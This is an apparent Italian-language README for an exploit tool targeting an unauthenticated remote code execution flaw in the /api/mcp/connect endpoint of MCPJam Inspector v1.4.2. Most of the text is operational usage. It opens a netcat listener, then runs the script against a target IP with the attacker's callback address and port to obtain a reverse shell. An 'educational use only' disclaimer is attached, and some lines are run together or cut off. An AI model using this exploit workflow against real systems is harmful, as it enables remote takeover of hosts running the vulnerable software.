
Questa utility è stata creata durante una ricerca che coinvolge MCPJam v1.4.2. L'applicazione espone un endpoint API che accetta un oggetto di configurazione del server. In determinate condizioni, una validazione insufficiente può consentire l'esecuzione non intenzionale di comandi.
MCPJam Inspector contiene una vulnerabilità di Esecuzione Remota di Codice (RCE) non autenticata nell'endpoint /api/mcp/connect. La vulnerabilità consente agli aggressori di eseguire comandi arbitrari inviando un payload di configurazione MCP server malizioso.
L'endpoint accetta un payload JSON con un oggetto serverConfig contenente un array command e args, che vengono eseguiti direttamente sul sistema senza una corretta validazione o sanitizzazione.
requests: pip install requestsnetcat o socat per il listenerTerminale 1 - Avvia il listener:
nc -lvnp 4444
Terminale 2 - Esegui l'exploit:
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444
# Default (port 6274, callback port 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>
# Custom MCPJam port
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>
# Custom listener port
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555
/api/mcp/connect⚠️ AVVISO:
Questo exploit è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Gli utenti sono gli unici responsabili di:
L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo strumento. Usalo a tuo rischio.
/api/mcp/connect